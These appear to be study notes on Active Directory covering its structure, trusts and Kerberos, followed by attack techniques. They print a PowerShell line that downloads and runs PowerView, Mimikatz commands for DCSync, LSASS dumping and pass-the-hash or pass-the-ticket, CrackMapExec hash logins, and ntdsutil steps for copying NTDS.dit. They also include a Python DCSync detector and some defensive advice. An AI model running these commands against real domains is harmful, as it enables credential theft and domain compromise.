Active Directory


Active Directory enables centralized, secure management of an entire network, which might span a building, a city, or multiple locations throughout the world.

Active Directory Introduction

These antiquated AD designs only focused on the:
  • Directory information tree
  • Delegation model
  • Group Policy Objects (GPOs) structure and accounts management

Securing privileged access - Active Directory administrative tier model:



Component Description

Organizational Units
  • Container object
  • Used to arrange other objects
  • Easier to locate and manage
  • Can delegate the authority to manage
  • Can be nested in other organizational units
Domains
  • Container object
  • Collection of administratively defined objects that share a common directory database, security policies, and trust relationships with other domains
  • Each domain is an administrative boundary for objects
  • A single domain can span multiple physical locations or sites
Domain Trees
  • Collections of domains that are grouped together in hierarchical structures
  • When you add a domain to a tree, it becomes a child of the tree root domain
  • The domain to which a child domain is attached is called the parent domain
  • A child domain might in turn have its own child domain
  • The name of a child domain is combined with the name of its parent domain to form its own unique Domain Name System (DNS) name, such as Corp.nwtraders.msft
  • Therefore a tree has a contiguous namespace
Forests
  • Instance of Active Directory
  • Each forest acts as a top-level container in that it houses all domain containers for that particular Active Directory instance
  • A forest can contain one or more domain container objects, all of which share a common logical structure, global catalog, directory schema, and directory configuration, as well as automatic two-way transitive trust relationships
  • The first domain in the forest is called the forest root domain
  • The name of that domain refers to the forest, such as Nwtraders.msft
  • By default, information in Active Directory is shared only within the forest
  • Therefore the forest is the security boundary for the information contained in that instance of Active Directory (a domain is only an administrative boundary)
Site Objects
  • Leaf and container objects
  • Topmost object in the hierarchy of objects that are used to manage and implement Active Directory replication
  • Stores the hierarchy of objects that are used by the Knowledge Consistency Checker (KCC) to build the replication topology
  • Objects in this hierarchy include NTDS Site Settings objects, subnet objects, connection objects, server objects, and site objects (one site object for each site in the forest)
  • The hierarchy is displayed as the contents of the Sites container, which is a child of the Configuration container

  • Schema - Defines objects and attributes
  • Query and index mechanism - Ability to search and publish objects and properties
  • Global Catalog - Contains info about every object in directory
  • Replication Service - Distributes information across domain controllers

  • Kerberos v5 has been the default authentication protocol since Windows 2000 Server

  • Naming conventions
  • User Principal name: winsaafman@scriptdotsh.local
  • DN (Distinguished Names) LDAP names: CN=winsaafman,DC=corp,DC=scriptdotsh,DC=local
    • CN = Common name
    • OU = Organisational Unit
    • DC = Domain
Load PowerView in memory and run Get-NetDomain (download URL omitted):
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Get-NetDomain"

AD Trust Types


Trust Type / Property / Trust Direction / Auth. / Details

Tree-Root
  • Transitive; two-way; Kerberos V5 or NTLM
  • Created automatically when a new tree is added to a forest.
Parent-Child
  • Transitive; two-way; Kerberos V5 or NTLM
  • Created automatically when a child domain is added.
Shortcut
  • Transitive; one-way or two-way; Kerberos V5 or NTLM
  • Created manually. Used within a forest to shorten the trust path and improve authentication times.
Forest
  • Transitive; one-way or two-way; Kerberos V5 or NTLM
  • Created manually. Used to share resources between AD DS forests.

Kerberos Process Across Trust Boundaries


A client in Domain1 wants to access a server located in Domain2.

  1. The client in Domain1 requests a TGT from DC1 (AS-REQ).
  2. DC1 responds with a TGT encrypted with the Domain1 krbtgt key (AS-REP).
  3. The client presents the TGT to DC1 and requests a TGS (service ticket) for the server in Domain2 (TGS-REQ).
  4. DC1 does not find the server in its own domain and realizes the service ticket has to be issued by DC2 (the DC of Domain2), so it responds with an inter-realm (referral) TGT encrypted with the inter-realm trust key shared by the two domains.
  5. The client presents the inter-realm TGT to DC2 and requests a TGS for the server.
  6. DC2 sends back the service ticket for the server, encrypted with the server account's key (its NT hash for RC4, or its AES key).
  7. The client presents the service ticket to the server for access (AP-REQ).

Scope of Authentication

  • Forest-wide authentication - users from the trusted forest get the same level of access to resources in the local forest as users who belong to the local forest (they are treated as Authenticated Users).
  • Selective authentication - you must manually grant the Allowed to Authenticate permission on each computer (and then permissions on the resources) that users in the other forest should reach, by editing the ACEs (access control entries).


Install-WindowsFeature AD-Domain-Services
Install-WindowsFeature RSAT-ADDS

Import-Module ADDSDeployment
# Prompts for the DSRM (SafeModeAdministrator) password; reboots when done.
Install-ADDSForest -CreateDnsDelegation:$false `
    -DatabasePath "C:\Windows\NTDS" `
    -DomainMode "Win2012R2" `
    -DomainName "server1.hacklab.local" `
    -DomainNetbiosName "server1" `
    -ForestMode "Win2012R2" `
    -InstallDns:$true `
    -LogPath "C:\Windows\NTDS" `
    -NoRebootOnCompletion:$false `
    -SysvolPath "C:\Windows\SYSVOL" `
    -Force:$true

Detect Firewall Blocking AD

PortQryUI:
  • Run the "Domains & Trusts" option between DCs, or between DCs and any machine.
  • "NOTLISTENING", 0x00000001, and 0x00000002 results mean a port is blocked.
  • UDP 389 and UDP 88 messages can be ignored.
  • TCP 42 errors just mean WINS is not running on the target server.

Implementing Least Privilege Model

Attack Types

  • Windows systems vulnerabilities.
  • AD misconfigurations.


pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
  • Automating AD Enumeration (Bloodhound, PowerUp, Responder, CrackMapExec):



DCSync uses the Directory Replication Service Remote Protocol (MS-DRSR) to ask a DC to replicate account secrets, retrieving the password hashes held in NTDS.DIT without ever touching the file:

lsadump::dcsync /domain:pentestlab.local /all /csv
lsadump::dcsync /domain:pentestlab.local /user:test

When Mimikatz is executed directly on the domain controller, password hashes can instead be dumped through the lsass.exe process:

lsadump::lsa /inject


CrackMapExec automates assessing the security of large Active Directory networks. Pass the hash over SMB (LM:NT, or the NT hash alone):

crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH
crackmapexec smb <target(s)> -u username -H NTHASH


Active (enabled) users: bit 0x2 of userAccountControl is ACCOUNTDISABLE, and the matching rule OID 1.2.840.113556.1.4.803 is a bitwise AND, so the negated clause keeps only enabled accounts:

ldapsearch -x -h $ip -p 389 -D 'SVC_TGS' -w $password -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname


  • Enumerate domain user accounts -all active.htb/svc_tgs -dc-ip $ip
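Added example, not part of the original notes: the same bitwise-AND test the LDAP server applies for the 1.2.840.113556.1.4.803 matching rule, run over constructed userAccountControl values. The flag values are the documented userAccountControl bits; the account entries and names are made up. It goes a little beyond the enabled/disabled filter above by also flagging the other bits an enumeration pass cares about (reversible encryption, no pre-auth, delegation).

```python
"""userAccountControl decoding and the LDAP bitwise-AND matching rule
(OID 1.2.840.113556.1.4.803). Added example; sample entries are constructed."""

UAC_FLAGS = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "HOMEDIR_REQUIRED": 0x0008,
    "LOCKOUT": 0x0010,
    "PASSWD_NOTREQD": 0x0020,
    "PASSWD_CANT_CHANGE": 0x0040,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x0080,  # "reversible encryption"
    "NORMAL_ACCOUNT": 0x0200,
    "INTERDOMAIN_TRUST_ACCOUNT": 0x0800,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "SMARTCARD_REQUIRED": 0x40000,
    "TRUSTED_FOR_DELEGATION": 0x80000,  # unconstrained delegation
    "NOT_DELEGATED": 0x100000,
    "USE_DES_KEY_ONLY": 0x200000,
    "DONT_REQ_PREAUTH": 0x400000,  # AS-REP roastable
    "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # protocol transition
}
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Flags worth a second look during enumeration (same bit semantics as the filter).
RISKY_FLAGS = ("ENCRYPTED_TEXT_PWD_ALLOWED", "PASSWD_NOTREQD", "DONT_REQ_PREAUTH",
               "TRUSTED_FOR_DELEGATION", "TRUSTED_TO_AUTH_FOR_DELEGATION",
               "USE_DES_KEY_ONLY")

# Constructed sample entries (made-up names), as a search returning
# sAMAccountName and userAccountControl would hand them back.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_tgs",   "userAccountControl": 0x10200},   # normal, password never expires
    {"sAMAccountName": "olduser",   "userAccountControl": 0x0202},    # normal, disabled
    {"sAMAccountName": "legacyapp", "userAccountControl": 0x400200},  # normal, no Kerberos pre-auth
    {"sAMAccountName": "WS01$",     "userAccountControl": 0x1000},    # workstation trust account
    {"sAMAccountName": "webfarm",   "userAccountControl": 0x80280},   # reversible pw + unconstrained delegation
]


def bit_and_matches(uac, mask):
    """(userAccountControl:1.2.840.113556.1.4.803:=mask) is true only when
    every bit of mask is set in the attribute value."""
    return (uac & mask) == mask


def build_filter(flag_name, negate=True):
    """Build the user filter used above; negate=True keeps accounts WITHOUT the flag."""
    clause = f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UAC_FLAGS[flag_name]})"
    if negate:
        clause = f"(!{clause})"
    return f"(&(objectCategory=person)(objectClass=user){clause})"


def decode_uac(value):
    """Names of all flags set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def enabled_accounts(entries):
    """Apply the server-side test for the negated ACCOUNTDISABLE clause."""
    return [e["sAMAccountName"] for e in entries
            if not bit_and_matches(e["userAccountControl"], UAC_FLAGS["ACCOUNTDISABLE"])]


def risky_accounts(entries):
    """Map sAMAccountName -> risky flag names, for enabled accounts only."""
    out = {}
    for e in entries:
        uac = e["userAccountControl"]
        if bit_and_matches(uac, UAC_FLAGS["ACCOUNTDISABLE"]):
            continue
        hits = [f for f in RISKY_FLAGS if bit_and_matches(uac, UAC_FLAGS[f])]
        if hits:
            out[e["sAMAccountName"]] = hits
    return out


if __name__ == "__main__":
    print(build_filter("ACCOUNTDISABLE"))
    for e in SAMPLE_ENTRIES:
        print(f'{e["sAMAccountName"]:<10} {e["userAccountControl"]:#08x} {decode_uac(e["userAccountControl"])}')
    print("enabled:", enabled_accounts(SAMPLE_ENTRIES))
    print("risky:", risky_accounts(SAMPLE_ENTRIES))
```

LDAP attribute names are case-insensitive, so the lower-case useraccountcontrol in the ldapsearch command and the mixed-case name built here select the same attribute. The same bits are what turns a NORMAL_ACCOUNT (0x200) into a WORKSTATION_TRUST_ACCOUNT (0x1000), which matters for the NetLogon trick later on this page.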


Using PowerShell and Built-ins

Works in Constrained Language Mode as well.


Import-Module .\Microsoft.ActiveDirectory.Management.dll
  • Domain: Get-ADDomain
  • Forest: Get-ADForest
  • Trust: Get-ADTrust -Filter *
  • Users: Get-ADUser -Filter *
  • Groups : Get-ADGroup -Filter *
  • Filter groups by name: Get-ADGroup -Filter {Name -like "*admin*"} | select name, GroupScope


PowerView:
  • All domain computers: Get-NetComputer
  • Domain Controller: Get-NetDomainController
  • Groups: Get-NetGroup
  • Sessions: Get-NetSession
  • ACL for AD objects: Get-ObjectAcl
  • Check if current user context has local-admin access to hosts in the domain: Find-LocalAdminAccess -Verbose
  • Enumerate members of local-admin groups across all machines: Invoke-EnumerateLocalAdmin -Verbose

Snapshot for Offline Analysis



UNC path: \\\tools


  • Finds groups and the members of each group.
  • Gets the computers in the domain.
  • Obtains the local admins of each computer.
  • Lists active sessions on each computer.
  • Then builds relationships between all these findings.



  • Folder which resides on every domain controller within the domain.
  • Contains the domain's public files (logon scripts, Group Policy templates) that need to be accessed by clients and kept synchronised between domain controllers.
  • Default location is C:\Windows\SYSVOL
  • The SYSVOL folder can be accessed through:
    • the domain-wide share \\<domain>\sysvol
    • or the local share name on the server, \\servername\sysvol
  • Uses DFS (Distributed File System) to publish the relevant folders to users and clients: client and server services that let servers organize distributed file shares into one distributed namespace.
  • File Replication Service (FRS) is a multi-master, multi-threaded replication technology.
    • Introduced in Windows 2000 to replace the LMREPL technology used in Windows NT 3.x and 4.0
    • Ageing cache - FRS detects changes by monitoring the NTFS USN journal; a change is held in the ageing cache (about 3 seconds) before it is recorded in the NTFRS database
    • Replaced by DFSR (Distributed File System Replication) in Windows Server 2008 and higher
      • Auto-healing functions are in place to remedy some of the issues seen with FRS
      • Instead of replicating entire files, only the chunks of data that have changed are replicated (Remote Differential Compression)
      • Based on MD4 hashes of the file chunks

FRS replication, step by step:
  1. A file is created (or deleted) in SYSVOL. FRS detects this through the USN journal and writes the file name and change time to its log (a table in the FRS database), from which it builds its change message.
  2. To keep the file and all its attributes (e.g. permissions) intact, FRS calls the backup API, which uses VSS to take a snapshot of the file and its attributes. The backup file is compressed and stored in the staging area folder.
  3. The outbound log is updated (again, a table within the FRS database). It contains information about all changes for a given replication set. If step 1 was a deletion rather than a creation, no staging file is created, but the outbound log reflects the deletion.
  4. FRS on DC1 sends a change notification to its replication partner DC2.
  5. DC2 adds the change to its inbound log, accepts it, and sends a change acknowledgment back to DC1.
  6. DC2 copies the file from DC1 into its own staging area and writes an entry to its outbound log so that other partners can pick up the change.
  7. DC2 calls the backup API to restore the file from the staging area into the SYSVOL folder.
A very detailed and in-depth reference guide is available on TechNet.


Attack Patterns



Dumping AD Credentials


Needs domain admin credentials (or replication rights): -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>


  • AD data is stored in %SYSTEMROOT%\NTDS\ntds.dit
  • The file is held open by the DC while it runs and cannot simply be copied to another location
  • It can be extracted using:
    • Domain controller replication services (DCSync)
    • Native Windows binaries
    • WMI
    • Backups / external storage of the DC
    • VMware / Hyper-V for virtual DCs
      • A VMware admin can snapshot or clone the virtual DC and copy the disk file
      • No events are triggered on the DC
    • NTDSUtil
      • DCPromo normally copies the directory from another DC
      • But if NTDSUtil was used to create IFM (Install From Media) media, that media contains a copy of NTDS.dit
      • Use NTDSUtil to create IFM media, or look for existing IFM media on the network
  • Extraction techniques and tools: Dumping Domain Password Hashes


  • cmd.exe as Administrator
  • ntdsutil
      snapshot
      activate instance ntds
      create
      mount <GUID>
  • copy NTDS.dit out of the mounted snapshot (located in Windows\NTDS\NTDS.dit by default)
  • ntdsutil
      snapshot
      unmount <GUID>
      delete <GUID>
  • save the SYSTEM hive, which holds the boot key needed to decrypt the hashes:
      reg.exe save HKLM\SYSTEM <path_where_you_want_to_save_it>
  • extract the hashes offline from the two files:
      -system <path_to_system_hive> -ntds <path_to_ntds.dit> LOCAL

Dumping Credentials on DC

  • Take a memory dump of the LSASS process (e.g. with Task Manager) and run Mimikatz against it offline
  • Run Mimikatz on the DC
  • Invoke-Mimikatz on the DC via PS remoting

Pass the Hash



  • In the typical scenario:
    • The user types the password
    • LSASS hashes the password (LM, NTLM) and uses the hash to authenticate to the service
  • In the attack scenario:
    • The attacker passes the hash (LM, NTLM) itself to LSASS, which uses it to authenticate to the service; the password is never needed
  • Preventions
    • Disable NTLM authentication (and stop storing LM hashes)
    • "Protected Users" group
    • Keep the NTLM authentication footprint in the event logs small, so the remaining NTLM logons stand out

Over Pass the Hash / Pass the Key


  • If the NTLM hash is available, encrypt the pre-authentication timestamp with it (RC4-HMAC etype) and send it to the KDC in the AS-REQ to get a TGT; the same works with an AES key ("pass the key")
  • Keys are in:
    • Client LSASS memory
      • Prevented by the "Protected Users" group
      • privilege::debug
        sekurlsa::ekeys
    • Active Directory
      • NTDS.dit and SYSTEM hive
      • Offline
        • [Tool] NTDSXtract
        • python ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 ./work -name Administrator --syshive SYSTEM --supplcreds --passwordhashes --lmoutfile ./lm --ntoutfile ./nt --pwdformat john
      • Online
        • privilege::debug
          lsadump::lsa /inject /name:Administrator
  • Key types:
    • DES
    • RC4 - the NT hash itself, with no domain or user salt
    • AES128 and AES256 keys (NT6+)
      • Derived with PBKDF2
      • Salted (realm and principal name)
      • 4096 iterations
      • Cracking is difficult
  • Over pass the hash
    • privilege::debug
      sekurlsa::pth /user:Administrator /domain:<DomainName> /ntlm:<Hash>
    • sekurlsa::pth also accepts /aes128:<key> and /aes256:<key>

Pass the Ticket




  • Inject a TGT into the LSASS Kerberos provider
  • Do not ask the KDC for a TGT; instead use the injected TGT to ask the KDC for a TGS
  • A TGS (service ticket) can also be injected into the LSASS Kerberos provider
  • Exporting from memory:
    • The API only allows exporting the current user's tickets (your own)
    • TGT: the AllowTgtSessionKey registry value (under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters) must be set, otherwise the exported TGT comes without its session key and is unusable
    • TGS: no restrictions
mimikatz > kerberos::list [/export]
mimikatz > kerberos::ptt <ticket.kirbi>
  • For all users in LSASS memory (needs privilege::debug):
sekurlsa::tickets /export
kerberos::ptt <ticket.kirbi>


DCSync

  • The same replication channel Azure AD Connect uses to sync AD to Azure AD
  • Can be used to get credentials from AD
  • If reversible encryption is enabled for an account, the clear-text password can be obtained
  • Needs Domain Admin or Domain Controller rights, or the replication extended rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) on the domain object
  • By default nothing is logged, since this is a legitimate directory replication RPC (MS-DRSR) performed remotely
  • Implemented by: Mimikatz (lsadump::dcsync), Impacket, DSInternals

  • DCSync is easy to detect once "Audit Directory Service Access" is enabled and the domain object's SACL covers the replication control-access rights: each DCSync produces event 4662 on the DC listing the GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (Get-Changes) and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (Get-Changes-All). Flag any such event whose subject is not a domain controller computer account or a known sync account (e.g. Azure AD Connect's MSOL_ account).
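Added example, not part of the original notes: the detection rule described above run over constructed Security event 4662 records. Real events arrive as EVTX/XML; the dicts below carry only the fields the rule needs (SubjectDomainName, SubjectUserName, AccessMask, Properties). The three replication GUIDs are the real control-access rights from the AD schema; every host, account and domain name is made up, including the allow-listed Azure AD Connect account.

```python
"""DCSync detection over constructed 4662 events. Added example."""
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # ADS_RIGHT_DS_CONTROL_ACCESS bit in the 4662 AccessMask
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed sample events (not real logs). Properties mirrors the 4662 text blob.
SAMPLE_EVENTS = [
    # Normal DC-to-DC replication: subject is a DC computer account
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "DC02$",
     "AccessMask": 0x100,
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # lsadump::dcsync run as an ordinary user who was granted replication rights
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "AccessMask": 0x100,
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # Azure AD Connect sync account: legitimate DCSync, allow-listed (hypothetical name)
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "MSOL_a1b2c3d4e5f6",
     "AccessMask": 0x100,
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Unrelated 4662: a property read, no control-access bit, no replication rights
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "AccessMask": 0x10,
     "Properties": "%%7683\n{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]

DC_ACCOUNTS = {"DC01$", "DC02$"}                 # hypothetical DC computer accounts
ALLOWLIST = {"CORP\\MSOL_A1B2C3D4E5F6"}           # hypothetical Azure AD Connect account


def classify(event, dc_accounts=DC_ACCOUNTS, allowlist=ALLOWLIST):
    """Return an alert dict for a suspected DCSync, or None."""
    if event.get("EventID") != 4662 or not event.get("AccessMask", 0) & CONTROL_ACCESS:
        return None
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    rights = [REPLICATION_RIGHTS[g] for g in REPLICATION_RIGHTS if g in guids]
    if not rights:
        return None
    subject = f'{event["SubjectDomainName"]}\\{event["SubjectUserName"]}'
    if event["SubjectUserName"].upper() in {a.upper() for a in dc_accounts}:
        return None          # DCs replicate with each other all day
    if subject.upper() in allowlist:
        return None          # known replicating service account
    # Get-Changes-All is what exposes secrets; Get-Changes alone is weaker evidence
    severity = "high" if "DS-Replication-Get-Changes-All" in rights else "medium"
    return {"subject": subject, "rights": rights, "severity": severity}


def detect_dcsync(events, dc_accounts=DC_ACCOUNTS, allowlist=ALLOWLIST):
    """All alerts for a batch of 4662 events, in input order."""
    return [a for a in (classify(e, dc_accounts, allowlist) for e in events) if a]


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print(alert)
```

The DC list and allow-list are the tuning knobs: keep the DC list generated from the Domain Controllers OU rather than hand-maintained, and review the allow-list whenever a new sync or backup product is deployed, since an attacker who compromises an allow-listed account inherits its silence.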

NRPC (NetLogon)

  • With a domain admin account for one DC, you can ask another DC (over the Netlogon RPC interface) to send the NTLM hashes of all computer accounts and domain controller accounts.
  • These can be used to create silver tickets.
  • If you have rights to flip some flags of an account, a normal user account can be made to look like a workstation account, and the same channel can then be used to obtain user account hashes.


  • Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory:
  • Escalating privileges with ACLs in Active Directory:

















  • How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller:
  • Attack Methods for Gaining Domain Admin Rights in Active Directory:
  • Mimikatz DCSync Usage, Exploitation, and Detection:
  • How Attackers Dump Active Directory Database Credentials:


  • Active Directory Core Security Principles & Best Practices:
  • Active Directory Kill Chain Attack & Defense:
  • Microsoft-Blue-Forest:
  • Welcome to building your first domain controller!:
  • Pwn and Defend - Active Directory Domain Enumeration:


  • Microsoft has definitely raised the bar: accounts that are members of the localgroup “Administrators” are no longer able to execute code with WMI or PSEXEC, use schtasks or at, or even browse the open shares on the target machine. Oh, except (as pwnag3 reports and our experiences confirm) the RID 500 built-in Administrator account, even if it’s renamed.